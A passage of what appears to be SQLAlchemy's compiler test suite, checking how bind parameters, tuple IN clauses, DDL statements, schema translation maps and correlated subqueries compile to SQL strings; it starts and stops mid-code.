:myotherid", "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " "? OR myothertable.otherid = ?", {"myid": 8, "myotherid": 7}, [8, 7], {"myid": 5}, {"myid": 5, "myotherid": 7}, [5, 7], ), ( select( [table1], or_( table1.c.myid == bindparam("myid", value=7, unique=True), table2.c.otherid == bindparam("myid", value=8, unique=True), ), ), "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " ":myid_1 OR myothertable.otherid = :myid_2", "SELECT mytable.myid, mytable.name, mytable.description FROM " "mytable, myothertable WHERE mytable.myid = " "? OR myothertable.otherid = ?", {"myid_1": 7, "myid_2": 8}, [7, 8], {"myid_1": 5, "myid_2": 6}, {"myid_1": 5, "myid_2": 6}, [5, 6], ), ]: self.assert_compile( stmt, expected_named_stmt, params=expected_default_params_dict ) self.assert_compile( stmt, expected_positional_stmt, dialect=sqlite.dialect() ) nonpositional = stmt.compile() positional = stmt.compile(dialect=sqlite.dialect()) pp = positional.params eq_( [pp[k] for k in positional.positiontup], expected_default_params_list, ) eq_( nonpositional.construct_params(test_param_dict), expected_test_params_dict, ) pp = positional.construct_params(test_param_dict) eq_( [pp[k] for k in positional.positiontup], expected_test_params_list, ) # check that params() doesn't modify original statement s = select( [table1], or_( table1.c.myid == bindparam("myid"), table2.c.otherid == bindparam("myotherid"), ), ) s2 = s.params({"myid": 8, "myotherid": 7}) s3 = s2.params({"myid": 9}) assert s.compile().params == {"myid": None, "myotherid": None} assert s2.compile().params == {"myid": 8, "myotherid": 7} assert s3.compile().params == {"myid": 9, "myotherid": 7} # test using same 'unique' param object twice in one compile s = select([table1.c.myid]).where(table1.c.myid == 12).as_scalar() s2 = select([table1, s], table1.c.myid == s) self.assert_compile( s2, "SELECT mytable.myid, mytable.name, mytable.description, " "(SELECT mytable.myid FROM mytable WHERE mytable.myid = " ":myid_1) AS anon_1 FROM mytable WHERE mytable.myid = " "(SELECT mytable.myid FROM mytable WHERE mytable.myid = :myid_1)", ) positional = s2.compile(dialect=sqlite.dialect()) pp = positional.params assert [pp[k] for k in positional.positiontup] == [12, 12] # check that conflicts with "unique" params are caught s = select( [table1], or_(table1.c.myid == 7, table1.c.myid == bindparam("myid_1")), ) assert_raises_message( exc.CompileError, "conflicts with unique bind parameter " "of the same name", str, s, ) s = select( [table1], or_( table1.c.myid == 7, table1.c.myid == 8, table1.c.myid == bindparam("myid_1"), ), ) assert_raises_message( exc.CompileError, "conflicts with unique bind parameter " "of the same name", str, s, ) def _test_binds_no_hash_collision(self): """test that construct_params doesn't corrupt dict due to hash collisions""" total_params = 100000 in_clause = [":in%d" % i for i in range(total_params)] params = dict(("in%d" % i, i) for i in range(total_params)) t = text("text clause %s" % ", ".join(in_clause)) eq_(len(t.bindparams), total_params) c = t.compile() pp = c.construct_params(params) eq_(len(set(pp)), total_params, "%s %s" % (len(set(pp)), len(pp))) eq_(len(set(pp.values())), total_params) def test_bind_anon_name_no_special_chars(self): for paramstyle in "named", "pyformat": dialect = default.DefaultDialect() dialect.paramstyle = paramstyle for name, named, pyformat in [ ("%(my name)s", ":my_name_s_1", "%(my_name_s_1)s"), ("myname(foo)", ":myname_foo_1", "%(myname_foo_1)s"), ( "this is a name", ":this_is_a_name_1", "%(this_is_a_name_1)s", ), ("_leading_one", ":leading_one_1", "%(leading_one_1)s"), ("3leading_two", ":3leading_two_1", "%(3leading_two_1)s"), ("$leading_three", ":leading_three_1", "%(leading_three_1)s"), ("%(tricky", ":tricky_1", "%(tricky_1)s"), ("5(tricky", ":5_tricky_1", "%(5_tricky_1)s"), ]: t = table("t", column(name, String)) expr = t.c[name] == "foo" self.assert_compile( expr, "t.%s = %s" % ( dialect.identifier_preparer.quote(name), named if paramstyle == "named" else pyformat, ), dialect=dialect, checkparams={named[1:]: "foo"}, ) def test_bind_anon_name_special_chars_uniqueify_one(self): # test that the chars are escaped before doing the counter, # otherwise these become the same name and bind params will conflict t = table("t", column("_3foo"), column("4%foo")) self.assert_compile( (t.c["_3foo"] == "foo") & (t.c["4%foo"] == "bar"), 't._3foo = :3foo_1 AND t."4%foo" = :4_foo_1', checkparams={"3foo_1": "foo", "4_foo_1": "bar"}, ) def test_bind_anon_name_special_chars_uniqueify_two(self): t = table("t", column("_3foo"), column("4(foo")) self.assert_compile( (t.c["_3foo"] == "foo") & (t.c["4(foo"] == "bar"), 't._3foo = :3foo_1 AND t."4(foo" = :4_foo_1', checkparams={"3foo_1": "foo", "4_foo_1": "bar"}, ) def test_bind_as_col(self): t = table("foo", column("id")) s = select([t, literal("lala").label("hoho")]) self.assert_compile(s, "SELECT foo.id, :param_1 AS hoho FROM foo") assert [str(c) for c in s.alias().c] == ["anon_1.id", "anon_1.hoho"] def test_bind_callable(self): expr = column("x") == bindparam("key", callable_=lambda: 12) self.assert_compile(expr, "x = :key", {"x": 12}) def test_bind_params_missing(self): assert_raises_message( exc.InvalidRequestError, r"A value is required for bind parameter 'x'", select([table1]) .where( and_( table1.c.myid == bindparam("x", required=True), table1.c.name == bindparam("y", required=True), ) ) .compile() .construct_params, params=dict(y=5), ) assert_raises_message( exc.InvalidRequestError, r"A value is required for bind parameter 'x'", select([table1]) .where(table1.c.myid == bindparam("x", required=True)) .compile() .construct_params, ) assert_raises_message( exc.InvalidRequestError, r"A value is required for bind parameter 'x', " "in parameter group 2", select([table1]) .where( and_( table1.c.myid == bindparam("x", required=True), table1.c.name == bindparam("y", required=True), ) ) .compile() .construct_params, params=dict(y=5), _group_number=2, ) assert_raises_message( exc.InvalidRequestError, r"A value is required for bind parameter 'x', " "in parameter group 2", select([table1]) .where(table1.c.myid == bindparam("x", required=True)) .compile() .construct_params, _group_number=2, ) def test_tuple(self): self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_([(1, "foo"), (5, "bar")]), "(mytable.myid, mytable.name) IN " "((:param_1, :param_2), (:param_3, :param_4))", ) dialect = default.DefaultDialect() dialect.tuple_in_values = True self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_([(1, "foo"), (5, "bar")]), "(mytable.myid, mytable.name) IN " "(VALUES (:param_1, :param_2), (:param_3, :param_4))", dialect=dialect, ) self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_( [tuple_(table2.c.otherid, table2.c.othername)] ), "(mytable.myid, mytable.name) IN " "((myothertable.otherid, myothertable.othername))", ) self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_( select([table2.c.otherid, table2.c.othername]) ), "(mytable.myid, mytable.name) IN (SELECT " "myothertable.otherid, myothertable.othername FROM myothertable)", ) def test_expanding_parameter(self): self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_( bindparam("foo", expanding=True) ), "(mytable.myid, mytable.name) IN ([EXPANDING_foo])", ) dialect = default.DefaultDialect() dialect.tuple_in_values = True self.assert_compile( tuple_(table1.c.myid, table1.c.name).in_( bindparam("foo", expanding=True) ), "(mytable.myid, mytable.name) IN ([EXPANDING_foo])", dialect=dialect, ) self.assert_compile( table1.c.myid.in_(bindparam("foo", expanding=True)), "mytable.myid IN ([EXPANDING_foo])", ) def test_limit_offset_select_literal_binds(self): stmt = select([1]).limit(5).offset(6) self.assert_compile( stmt, "SELECT 1 LIMIT 5 OFFSET 6", literal_binds=True ) def test_limit_offset_compound_select_literal_binds(self): stmt = select([1]).union(select([2])).limit(5).offset(6) self.assert_compile( stmt, "SELECT 1 UNION SELECT 2 LIMIT 5 OFFSET 6", literal_binds=True, ) def test_multiple_col_binds(self): self.assert_compile( select( [literal_column("*")], or_( table1.c.myid == 12, table1.c.myid == "asdf", table1.c.myid == "foo", ), ), "SELECT * FROM mytable WHERE mytable.myid = :myid_1 " "OR mytable.myid = :myid_2 OR mytable.myid = :myid_3", ) def test_render_binds_as_literal(self): """test a compiler that renders binds inline into SQL in the columns clause.""" dialect = default.DefaultDialect() class Compiler(dialect.statement_compiler): ansi_bind_rules = True dialect.statement_compiler = Compiler self.assert_compile( select([literal("someliteral")]), "SELECT 'someliteral' AS anon_1", dialect=dialect, ) self.assert_compile( select([table1.c.myid + 3]), "SELECT mytable.myid + 3 AS anon_1 FROM mytable", dialect=dialect, ) self.assert_compile( select([table1.c.myid.in_([4, 5, 6])]), "SELECT mytable.myid IN (4, 5, 6) AS anon_1 FROM mytable", dialect=dialect, ) self.assert_compile( select([func.mod(table1.c.myid, 5)]), "SELECT mod(mytable.myid, 5) AS mod_1 FROM mytable", dialect=dialect, ) self.assert_compile( select([literal("foo").in_([])]), "SELECT 1 != 1 AS anon_1", dialect=dialect, ) self.assert_compile( select([literal(util.b("foo"))]), "SELECT 'foo' AS anon_1", dialect=dialect, ) # test callable self.assert_compile( select([table1.c.myid == bindparam("foo", callable_=lambda: 5)]), "SELECT mytable.myid = 5 AS anon_1 FROM mytable", dialect=dialect, ) empty_in_dialect = default.DefaultDialect(empty_in_strategy="dynamic") empty_in_dialect.statement_compiler = Compiler assert_raises_message( exc.CompileError, "Bind parameter 'foo' without a " "renderable value not allowed here.", bindparam("foo").in_([]).compile, dialect=empty_in_dialect, ) def test_render_expanding_parameter(self): self.assert_compile( select([table1.c.myid]).where( table1.c.myid.in_(bindparam("foo", expanding=True)) ), "SELECT mytable.myid FROM mytable " "WHERE mytable.myid IN ([EXPANDING_foo])", ) def test_render_expanding_parameter_literal_binds(self): self.assert_compile( select([table1.c.myid]).where( table1.c.myid.in_(bindparam("foo", [1, 2, 3], expanding=True)) ), "SELECT mytable.myid FROM mytable " "WHERE mytable.myid IN [1, 2, 3]", literal_binds=True, ) class UnsupportedTest(fixtures.TestBase): def test_unsupported_element_str_visit_name(self): from sqlalchemy.sql.expression import ClauseElement class SomeElement(ClauseElement): __visit_name__ = "some_element" assert_raises_message( exc.UnsupportedCompilationError, r"Compiler <sqlalchemy.sql.compiler.StrSQLCompiler .*" r"can't render element of type <class '.*SomeElement'>", SomeElement().compile, ) def test_unsupported_element_meth_visit_name(self): from sqlalchemy.sql.expression import ClauseElement class SomeElement(ClauseElement): @classmethod def __visit_name__(cls): return "some_element" assert_raises_message( exc.UnsupportedCompilationError, r"Compiler <sqlalchemy.sql.compiler.StrSQLCompiler .*" r"can't render element of type <class '.*SomeElement'>", SomeElement().compile, ) def test_unsupported_operator(self): from sqlalchemy.sql.expression import BinaryExpression def myop(x, y): pass binary = BinaryExpression(column("foo"), column("bar"), myop) assert_raises_message( exc.UnsupportedCompilationError, r"Compiler <sqlalchemy.sql.compiler.StrSQLCompiler .*" r"can't render element of type <function.*", binary.compile, ) class StringifySpecialTest(fixtures.TestBase): def test_basic(self): stmt = select([table1]).where(table1.c.myid == 10) eq_ignore_whitespace( str(stmt), "SELECT mytable.myid, mytable.name, mytable.description " "FROM mytable WHERE mytable.myid = :myid_1", ) def test_unnamed_column(self): stmt = Column(Integer) == 5 eq_ignore_whitespace(str(stmt), '"<name unknown>" = :param_1') def test_cte(self): # stringify of these was supported anyway by defaultdialect. stmt = select([table1.c.myid]).cte() stmt = select([stmt]) eq_ignore_whitespace( str(stmt), "WITH anon_1 AS (SELECT mytable.myid AS myid FROM mytable) " "SELECT anon_1.myid FROM anon_1", ) def test_next_sequence_value(self): # using descriptive text that is intentionally not compatible # with any particular backend, since all backends have different # syntax seq = Sequence("my_sequence") eq_ignore_whitespace( str(seq.next_value()), "<next sequence value: my_sequence>" ) def test_returning(self): stmt = table1.insert().returning(table1.c.myid) eq_ignore_whitespace( str(stmt), "INSERT INTO mytable (myid, name, description) " "VALUES (:myid, :name, :description) RETURNING mytable.myid", ) def test_array_index(self): stmt = select([column("foo", types.ARRAY(Integer))[5]]) eq_ignore_whitespace(str(stmt), "SELECT foo[:foo_1] AS anon_1") def test_unknown_type(self): class MyType(types.TypeEngine): __visit_name__ = "mytype" stmt = select([cast(table1.c.myid, MyType)]) eq_ignore_whitespace( str(stmt), "SELECT CAST(mytable.myid AS MyType) AS anon_1 FROM mytable", ) def test_within_group(self): # stringify of these was supported anyway by defaultdialect. from sqlalchemy import within_group stmt = select( [ table1.c.myid, within_group(func.percentile_cont(0.5), table1.c.name.desc()), ] ) eq_ignore_whitespace( str(stmt), "SELECT mytable.myid, percentile_cont(:percentile_cont_1) " "WITHIN GROUP (ORDER BY mytable.name DESC) AS anon_1 FROM mytable", ) class KwargPropagationTest(fixtures.TestBase): @classmethod def setup_class(cls): from sqlalchemy.sql.expression import ColumnClause, TableClause class CatchCol(ColumnClause): pass class CatchTable(TableClause): pass cls.column = CatchCol("x") cls.table = CatchTable("y") cls.criterion = cls.column == CatchCol("y") @compiles(CatchCol) def compile_col(element, compiler, **kw): assert "canary" in kw return compiler.visit_column(element) @compiles(CatchTable) def compile_table(element, compiler, **kw): assert "canary" in kw return compiler.visit_table(element) def _do_test(self, element): d = default.DefaultDialect() d.statement_compiler(d, element, compile_kwargs={"canary": True}) def test_binary(self): self._do_test(self.column == 5) def test_select(self): s = ( select([self.column]) .select_from(self.table) .where(self.column == self.criterion) .order_by(self.column) ) self._do_test(s) def test_case(self): c = case([(self.criterion, self.column)], else_=self.column) self._do_test(c) def test_cast(self): c = cast(self.column, Integer) self._do_test(c) class ExecutionOptionsTest(fixtures.TestBase): def test_non_dml(self): stmt = table1.select() compiled = stmt.compile() eq_(compiled.execution_options, {}) def test_dml(self): stmt = table1.insert() compiled = stmt.compile() eq_(compiled.execution_options, {"autocommit": True}) def test_embedded_element_true_to_none(self): stmt = table1.insert().cte() eq_(stmt._execution_options, {"autocommit": True}) s2 = select([table1]).select_from(stmt) eq_(s2._execution_options, {}) compiled = s2.compile() eq_(compiled.execution_options, {"autocommit": True}) def test_embedded_element_true_to_false(self): stmt = table1.insert().cte() eq_(stmt._execution_options, {"autocommit": True}) s2 = ( select([table1]) .select_from(stmt) .execution_options(autocommit=False) ) eq_(s2._execution_options, {"autocommit": False}) compiled = s2.compile() eq_(compiled.execution_options, {"autocommit": False}) class DDLTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = "default" def _illegal_type_fixture(self): class MyType(types.TypeEngine): pass @compiles(MyType) def compile_(element, compiler, **kw): raise exc.CompileError("Couldn't compile type") return MyType def test_reraise_of_column_spec_issue(self): MyType = self._illegal_type_fixture() t1 = Table("t", MetaData(), Column("x", MyType())) assert_raises_message( exc.CompileError, r"\(in table 't', column 'x'\): Couldn't compile type", schema.CreateTable(t1).compile, ) def test_reraise_of_column_spec_issue_unicode(self): MyType = self._illegal_type_fixture() t1 = Table("t", MetaData(), Column(u("méil"), MyType())) assert_raises_message( exc.CompileError, u(r"\(in table 't', column 'méil'\): Couldn't compile type"), schema.CreateTable(t1).compile, ) def test_system_flag(self): m = MetaData() t = Table( "t", m, Column("x", Integer), Column("y", Integer, system=True), Column("z", Integer), ) self.assert_compile( schema.CreateTable(t), "CREATE TABLE t (x INTEGER, z INTEGER)" ) m2 = MetaData() t2 = t.tometadata(m2) self.assert_compile( schema.CreateTable(t2), "CREATE TABLE t (x INTEGER, z INTEGER)" ) def test_composite_pk_constraint_autoinc_first_implicit(self): m = MetaData() t = Table( "t", m, Column("a", Integer, primary_key=True), Column("b", Integer, primary_key=True, autoincrement=True), ) self.assert_compile( schema.CreateTable(t), "CREATE TABLE t (" "a INTEGER NOT NULL, " "b INTEGER NOT NULL, " "PRIMARY KEY (b, a))", ) def test_composite_pk_constraint_maintains_order_explicit(self): m = MetaData() t = Table( "t", m, Column("a", Integer), Column("b", Integer, autoincrement=True), schema.PrimaryKeyConstraint("a", "b"), ) self.assert_compile( schema.CreateTable(t), "CREATE TABLE t (" "a INTEGER NOT NULL, " "b INTEGER NOT NULL, " "PRIMARY KEY (a, b))", ) def test_create_table_suffix(self): class MyDialect(default.DefaultDialect): class MyCompiler(compiler.DDLCompiler): def create_table_suffix(self, table): return "SOME SUFFIX" ddl_compiler = MyCompiler m = MetaData() t1 = Table("t1", m, Column("q", Integer)) self.assert_compile( schema.CreateTable(t1), "CREATE TABLE t1 SOME SUFFIX (q INTEGER)", dialect=MyDialect(), ) def test_table_no_cols(self): m = MetaData() t1 = Table("t1", m) self.assert_compile(schema.CreateTable(t1), "CREATE TABLE t1 ()") def test_table_no_cols_w_constraint(self): m = MetaData() t1 = Table("t1", m, CheckConstraint("a = 1")) self.assert_compile( schema.CreateTable(t1), "CREATE TABLE t1 (CHECK (a = 1))" ) def test_table_one_col_w_constraint(self): m = MetaData() t1 = Table("t1", m, Column("q", Integer), CheckConstraint("a = 1")) self.assert_compile( schema.CreateTable(t1), "CREATE TABLE t1 (q INTEGER, CHECK (a = 1))", ) def test_schema_translate_map_table(self): m = MetaData() t1 = Table("t1", m, Column("q", Integer)) t2 = Table("t2", m, Column("q", Integer), schema="foo") t3 = Table("t3", m, Column("q", Integer), schema="bar") schema_translate_map = {None: "z", "bar": None, "foo": "bat"} self.assert_compile( schema.CreateTable(t1), "CREATE TABLE z.t1 (q INTEGER)", schema_translate_map=schema_translate_map, ) self.assert_compile( schema.CreateTable(t2), "CREATE TABLE bat.t2 (q INTEGER)", schema_translate_map=schema_translate_map, ) self.assert_compile( schema.CreateTable(t3), "CREATE TABLE t3 (q INTEGER)", schema_translate_map=schema_translate_map, ) def test_schema_translate_map_sequence(self): s1 = schema.Sequence("s1") s2 = schema.Sequence("s2", schema="foo") s3 = schema.Sequence("s3", schema="bar") schema_translate_map = {None: "z", "bar": None, "foo": "bat"} self.assert_compile( schema.CreateSequence(s1), "CREATE SEQUENCE z.s1", schema_translate_map=schema_translate_map, ) self.assert_compile( schema.CreateSequence(s2), "CREATE SEQUENCE bat.s2", schema_translate_map=schema_translate_map, ) self.assert_compile( schema.CreateSequence(s3), "CREATE SEQUENCE s3", schema_translate_map=schema_translate_map, ) def test_fk_render(self): a = Table("a", MetaData(), Column("q", Integer)) b = Table("b", MetaData(), Column("p", Integer)) self.assert_compile( schema.AddConstraint( schema.ForeignKeyConstraint([a.c.q], [b.c.p]) ), "ALTER TABLE a ADD FOREIGN KEY(q) REFERENCES b (p)", ) self.assert_compile( schema.AddConstraint( schema.ForeignKeyConstraint( [a.c.q], [b.c.p], onupdate="SET NULL", ondelete="CASCADE" ) ), "ALTER TABLE a ADD FOREIGN KEY(q) REFERENCES b (p) " "ON DELETE CASCADE ON UPDATE SET NULL", ) self.assert_compile( schema.AddConstraint( schema.ForeignKeyConstraint( [a.c.q], [b.c.p], initially="DEFERRED" ) ), "ALTER TABLE a ADD FOREIGN KEY(q) REFERENCES b (p) " "INITIALLY DEFERRED", ) def test_fk_illegal_sql_phrases(self): a = Table("a", MetaData(), Column("q", Integer)) b = Table("b", MetaData(), Column("p", Integer)) for kw in ("onupdate", "ondelete", "initially"): for phrase in ( "NOT SQL", "INITALLY NOT SQL", "FOO RESTRICT", "CASCADE WRONG", "SET NULL", ): const = schema.AddConstraint( schema.ForeignKeyConstraint( [a.c.q], [b.c.p], **{kw: phrase} ) ) assert_raises_message( exc.CompileError, r"Unexpected SQL phrase: '%s'" % phrase, const.compile, ) class SchemaTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = "default" def test_select(self): self.assert_compile( table4.select(), "SELECT remote_owner.remotetable.rem_id, " "remote_owner.remotetable.datatype_id," " remote_owner.remotetable.value " "FROM remote_owner.remotetable", ) self.assert_compile( table4.select( and_(table4.c.datatype_id == 7, table4.c.value == "hi") ), "SELECT remote_owner.remotetable.rem_id, " "remote_owner.remotetable.datatype_id," " remote_owner.remotetable.value " "FROM remote_owner.remotetable WHERE " "remote_owner.remotetable.datatype_id = :datatype_id_1 AND" " remote_owner.remotetable.value = :value_1", ) s = table4.select( and_(table4.c.datatype_id == 7, table4.c.value == "hi"), use_labels=True, ) self.assert_compile( s, "SELECT remote_owner.remotetable.rem_id AS" " remote_owner_remotetable_rem_id, " "remote_owner.remotetable.datatype_id AS" " remote_owner_remotetable_datatype_id, " "remote_owner.remotetable.value " "AS remote_owner_remotetable_value FROM " "remote_owner.remotetable WHERE " "remote_owner.remotetable.datatype_id = :datatype_id_1 AND " "remote_owner.remotetable.value = :value_1", ) # multi-part schema name self.assert_compile( table5.select(), 'SELECT "dbo.remote_owner".remotetable.rem_id, ' '"dbo.remote_owner".remotetable.datatype_id, ' '"dbo.remote_owner".remotetable.value ' 'FROM "dbo.remote_owner".remotetable', ) # multi-part schema name labels - convert '.' to '_' self.assert_compile( table5.select(use_labels=True), 'SELECT "dbo.remote_owner".remotetable.rem_id AS' " dbo_remote_owner_remotetable_rem_id, " '"dbo.remote_owner".remotetable.datatype_id' " AS dbo_remote_owner_remotetable_datatype_id," ' "dbo.remote_owner".remotetable.value AS ' "dbo_remote_owner_remotetable_value FROM" ' "dbo.remote_owner".remotetable', ) def test_schema_translate_select(self): m = MetaData() table1 = Table( "mytable", m, Column("myid", Integer), Column("name", String), Column("description", String), ) schema_translate_map = {"remote_owner": "foob", None: "bar"} self.assert_compile( table1.select().where(table1.c.name == "hi"), "SELECT bar.mytable.myid, bar.mytable.name, " "bar.mytable.description FROM bar.mytable " "WHERE bar.mytable.name = :name_1", schema_translate_map=schema_translate_map, ) self.assert_compile( table4.select().where(table4.c.value == "hi"), "SELECT foob.remotetable.rem_id, foob.remotetable.datatype_id, " "foob.remotetable.value FROM foob.remotetable " "WHERE foob.remotetable.value = :value_1", schema_translate_map=schema_translate_map, ) schema_translate_map = {"remote_owner": "foob"} self.assert_compile( select([table1, table4]).select_from( join(table1, table4, table1.c.myid == table4.c.rem_id) ), "SELECT mytable.myid, mytable.name, mytable.description, " "foob.remotetable.rem_id, foob.remotetable.datatype_id, " "foob.remotetable.value FROM mytable JOIN foob.remotetable " "ON mytable.myid = foob.remotetable.rem_id", schema_translate_map=schema_translate_map, ) def test_schema_translate_aliases(self): schema_translate_map = {None: "bar"} m = MetaData() table1 = Table( "mytable", m, Column("myid", Integer), Column("name", String), Column("description", String), ) table2 = Table( "myothertable", m, Column("otherid", Integer), Column("othername", String), ) alias = table1.alias() stmt = ( select([table2, alias]) .select_from(table2.join(alias, table2.c.otherid == alias.c.myid)) .where(alias.c.name == "foo") ) self.assert_compile( stmt, "SELECT bar.myothertable.otherid, bar.myothertable.othername, " "mytable_1.myid, mytable_1.name, mytable_1.description " "FROM bar.myothertable JOIN bar.mytable AS mytable_1 " "ON bar.myothertable.otherid = mytable_1.myid " "WHERE mytable_1.name = :name_1", schema_translate_map=schema_translate_map, ) def test_schema_translate_crud(self): schema_translate_map = {"remote_owner": "foob", None: "bar"} m = MetaData() table1 = Table( "mytable", m, Column("myid", Integer), Column("name", String), Column("description", String), ) self.assert_compile( table1.insert().values(description="foo"), "INSERT INTO bar.mytable (description) VALUES (:description)", schema_translate_map=schema_translate_map, ) self.assert_compile( table1.update() .where(table1.c.name == "hi") .values(description="foo"), "UPDATE bar.mytable SET description=:description " "WHERE bar.mytable.name = :name_1", schema_translate_map=schema_translate_map, ) self.assert_compile( table1.delete().where(table1.c.name == "hi"), "DELETE FROM bar.mytable WHERE bar.mytable.name = :name_1", schema_translate_map=schema_translate_map, ) self.assert_compile( table4.insert().values(value="there"), "INSERT INTO foob.remotetable (value) VALUES (:value)", schema_translate_map=schema_translate_map, ) self.assert_compile( table4.update() .where(table4.c.value == "hi") .values(value="there"), "UPDATE foob.remotetable SET value=:value " "WHERE foob.remotetable.value = :value_1", schema_translate_map=schema_translate_map, ) self.assert_compile( table4.delete().where(table4.c.value == "hi"), "DELETE FROM foob.remotetable WHERE " "foob.remotetable.value = :value_1", schema_translate_map=schema_translate_map, ) def test_alias(self): a = alias(table4, "remtable") self.assert_compile( a.select(a.c.datatype_id == 7), "SELECT remtable.rem_id, remtable.datatype_id, " "remtable.value FROM" " remote_owner.remotetable AS remtable " "WHERE remtable.datatype_id = :datatype_id_1", ) def test_update(self): self.assert_compile( table4.update( table4.c.value == "test", values={table4.c.datatype_id: 12} ), "UPDATE remote_owner.remotetable SET datatype_id=:datatype_id " "WHERE remote_owner.remotetable.value = :value_1", ) def test_insert(self): self.assert_compile( table4.insert(values=(2, 5, "test")), "INSERT INTO remote_owner.remotetable " "(rem_id, datatype_id, value) VALUES " "(:rem_id, :datatype_id, :value)", ) class CorrelateTest(fixtures.TestBase, AssertsCompiledSQL): __dialect__ = "default" def test_dont_overcorrelate(self): self.assert_compile( select([table1], from_obj=[table1, table1.select()]), "SELECT mytable.myid, mytable.name, " "mytable.description FROM mytable, (SELECT " "mytable.myid AS myid, mytable.name AS " "name, mytable.description AS description " "FROM mytable)", ) def _fixture(self): t1 = table("t1", column("a")) t2 = table("t2", column("a")) return t1, t2, select([t1]).where(t1.c.a == t2.c.a) def _assert_where_correlated(self, stmt): self.assert_compile( stmt, "SELECT t2.a FROM t2 WHERE t2.a = " "(SELECT t1.a FROM t1 WHERE t1.a = t2.a)", ) def _assert_where_all_correlated(self, stmt): self.assert_compile( stmt, "SELECT t1.a, t2.a FROM t1, t2 WHERE t2.a = " "(SELECT t1.a WHERE t1.a = t2.a)", ) # note there's no more "backwards" correlation after # we've done #2746 # def _assert_where_backwards_correlated(self, stmt): # self.assert_compile( # stmt, # "SELECT t2.a FROM t2 WHERE t2.a = " # "(SELECT t1.a FROM t2 WHERE t1.a = t2.a)") # def _assert_column_backwards_correlated(self, stmt): # self.assert_compile(stmt, # "SELECT t2.a, (SELECT t1.a FROM t2 WHERE t1.a = t2.a) " # "AS anon_1 FROM t2") def _assert_column_correlated(self, stmt): self.assert_compile( stmt, "SELECT t2.a, (SELECT t1.a FROM t1 WHERE t1.a = t2.a) " "AS anon_1 FROM t2", ) def _assert_column_all_correlated(self, stmt): self.assert_compile( stmt, "SELECT t1.a, t2.a, " "(SELECT t1.a WHERE t1.a = t2.a) AS anon_1 FROM t1, t2", ) def _assert_having_correlated(self, stmt): self.assert_compile( stmt, "SELECT t2.a FROM t2 HAVING t2.a = " "(SELECT t1.a FROM t1 WHERE t1.a = t2.a)", ) def _assert_from_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t2.a, anon_1.a FROM t2, " "(SELECT t1.a AS a FROM t1, t2 WHERE t1.a = t2.a) AS anon_1", ) def _assert_from_all_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t1.a, t2.a, anon_1.a FROM t1, t2, " "(SELECT t1.a AS a FROM t1, t2 WHERE t1.a = t2.a) AS anon_1", ) def _assert_where_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t2.a FROM t2 WHERE t2.a = " "(SELECT t1.a FROM t1, t2 WHERE t1.a = t2.a)", ) def _assert_column_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t2.a, (SELECT t1.a FROM t1, t2 " "WHERE t1.a = t2.a) AS anon_1 FROM t2", ) def _assert_having_uncorrelated(self, stmt): self.assert_compile( stmt, "SELECT t2.a FROM t2 HAVING t2.a = " "(SELECT t1.a FROM t1, t2 WHERE t1.a = t2.a)", ) def _assert_where_single_full_correlated(self, stmt): self.assert_compile( stmt, "SELECT t1.a FROM t1 WHERE t1.a = (SELECT t1.a)" ) def test_correlate_semiauto_where(self): t1, t2, s1 = self._fixture() self._assert_where_correlated( select([t2]).where(t2.c.a == s1.correlate(t2)) ) def test_correlate_semiauto_column(self): t1, t2, s1 = self._fixture() self._assert_column_correlated( select([t2, s1.correlate(t2).as_scalar()]) ) def test_correlate_semiauto_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated(select([t2, s1.correlate(t2).alias()])) def test_correlate_semiauto_having(self): t1, t2, s1 = self._fixture() self._assert_having_correlated( select([t2]).having(t2.c.a == s1.correlate(t2)) ) def test_correlate_except_inclusion_where(self): t1, t2, s1 = self._fixture() self._assert_where_correlated( select([t2]).where(t2.c.a == s1.correlate_except(t1)) ) def test_correlate_except_exclusion_where(self): t1, t2, s1 = self._fixture() self._assert_where_uncorrelated( select([t2]).where(t2.c.a == s1.correlate_except(t2)) ) def test_correlate_except_inclusion_column(self): t1, t2, s1 = self._fixture() self._assert_column_correlated( select([t2, s1.correlate_except(t1).as_scalar()]) ) def test_correlate_except_exclusion_column(self): t1, t2, s1 = self._fixture() self._assert_column_uncorrelated( select([t2, s1.correlate_except(t2).as_scalar()]) ) def test_correlate_except_inclusion_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated( select([t2, s1.correlate_except(t1).alias()]) ) def test_correlate_except_exclusion_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated( select([t2, s1.correlate_except(t2).alias()]) ) def test_correlate_except_none(self): t1, t2, s1 = self._fixture() self._assert_where_all_correlated( select([t1, t2]).where(t2.c.a == s1.correlate_except(None)) ) def test_correlate_except_having(self): t1, t2, s1 = self._fixture() self._assert_having_correlated( select([t2]).having(t2.c.a == s1.correlate_except(t1)) ) def test_correlate_auto_where(self): t1, t2, s1 = self._fixture() self._assert_where_correlated(select([t2]).where(t2.c.a == s1)) def test_correlate_auto_column(self): t1, t2, s1 = self._fixture() self._assert_column_correlated(select([t2, s1.as_scalar()])) def test_correlate_auto_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated(select([t2, s1.alias()])) def test_correlate_auto_having(self): t1, t2, s1 = self._fixture() self._assert_having_correlated(select([t2]).having(t2.c.a == s1)) def test_correlate_disabled_where(self): t1, t2, s1 = self._fixture() self._assert_where_uncorrelated( select([t2]).where(t2.c.a == s1.correlate(None)) ) def test_correlate_disabled_column(self): t1, t2, s1 = self._fixture() self._assert_column_uncorrelated( select([t2, s1.correlate(None).as_scalar()]) ) def test_correlate_disabled_from(self): t1, t2, s1 = self._fixture() self._assert_from_uncorrelated( select([t2, s1.correlate(None).alias()]) ) def test_correlate_disabled_having(self): t1, t2, s1 = self._fixture() self._assert_having_uncorrelated( select([t2]).having(t2.c.a == s1.correlate(None)) ) def test_correlate_all_where(self): t1, t2, s1 = self._fixture() 